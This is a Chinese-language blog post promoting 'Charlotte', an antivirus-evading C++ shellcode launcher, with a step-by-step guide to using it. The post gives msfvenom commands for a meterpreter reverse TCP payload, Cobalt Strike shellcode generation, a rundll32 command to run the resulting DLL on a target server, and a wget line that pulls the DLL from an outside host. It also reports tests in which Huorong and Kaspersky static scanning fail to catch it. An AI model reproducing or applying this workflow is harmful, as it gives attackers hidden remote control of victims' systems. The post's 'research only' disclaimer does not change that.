charlotte免杀c++ shellcode启动器|杀毒软件绕过

charlotte免杀c++ shellcode启动器|杀毒软件绕过

Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

项目地址:

https://github.com/9emin1/charlotte

Charlotte特色

  1. c++ shellcode 启动器,截至 2021 年 5 月 13 日完全未被检测到 0/26。
  2. win32 api函数的动态调用
  3. shellcode和函数名的异或加密
  4. 每次运行随机 XOR 键和变量
  5. 在 Kali Linux 上,只需“apt-get install mingw-w64*”即可!
  6. 随机字符串长度和 XOR 密钥长度

杀毒软件检测截图

charlotte免杀c++ shellcode启动器|杀毒软件绕过

用法

git clone 存储库,生成命名为 beacon.bin 的 shellcode 文件,然后运行 ​​charlotte.py

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
profit

使用 msfvenom -p(显示在下面的 gif POC 中)以及cobalt strike攻击原始格式有效负载进行测试

charlotte免杀c++ shellcode启动器|杀毒软件绕过

更新 v1.1

2021 年 5 月 17 日:

显然 Microsoft Windows Defender 能够检测到 .DLL 二进制文件,

他们是如何标记它的?通过寻找几个 16 字节大小的 XOR 键

将其更改为下面 POC .gif 中所示的 9 表明它现在再次未被检测到

干杯!

charlotte免杀c++ shellcode启动器|杀毒软件绕过

使用方法

启动命令

python charlotte.py
charlotte免杀c++ shellcode启动器|杀毒软件绕过

生成dll木马:

①使用msfvenom 生成shellcode

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$你的服务器ip LPORT=$你的服务器端口 -f raw > beacon.bin

②使用cobalt strike生成shellcode

[1]cs生成原始shellcode

charlotte免杀c++ shellcode启动器|杀毒软件绕过

选择row格式:

charlotte免杀c++ shellcode启动器|杀毒软件绕过

[2]把生成的payload.bin改名为beacon.bin

[3]把beacon.bin复制到kali里面的charlotte目录下

charlotte免杀c++ shellcode启动器|杀毒软件绕过

[4]输入如下命令生成dll文件

python charlotte.py

[5]在目标服务器上运行dll文件即可成功在cs上线

命令如下:

rundll32 charlotte.dll,lhFqKEHh
charlotte免杀c++ shellcode启动器|杀毒软件绕过

可通过如下命令从服务器上下载dll文件到目标服务器上.

wget https://www.ddosi.com/xss.dll -O xss.dll

[6]生成的dll文件火绒扫描并未发现病毒.

charlotte免杀c++ shellcode启动器|杀毒软件绕过

运行后火绒也不曾拦截.

[7]成功在cobalt strike上线

charlotte免杀c++ shellcode启动器|杀毒软件绕过

[8]病毒pid及进程截图

charlotte免杀c++ shellcode启动器|杀毒软件绕过

杀毒软件测试

①火绒免杀测试

文件读取及截图火绒未拦截:

成功绕过火绒杀毒软件.

charlotte免杀c++ shellcode启动器|杀毒软件绕过
charlotte免杀c++ shellcode启动器|杀毒软件绕过

②卡巴斯基免杀测试

卡巴斯基静态查杀未扫描出病毒

charlotte免杀c++ shellcode启动器|杀毒软件绕过

运行木马卡巴斯基终止进程并清除了木马 (:

charlotte免杀c++ shellcode启动器|杀毒软件绕过

其他杀毒软件自行测试.

下载地址

①GitHub:

https://github.com/9emin1/charlotte.zip

②中转云:
charlotte-main.rar
解压密码: www.ddosi.com

注意事项:

lhFqKEHh 为此处的名字:

charlotte免杀c++ shellcode启动器|杀毒软件绕过

②仅可作为研究使用,切勿用于非法活动.

转载请注明出处及链接.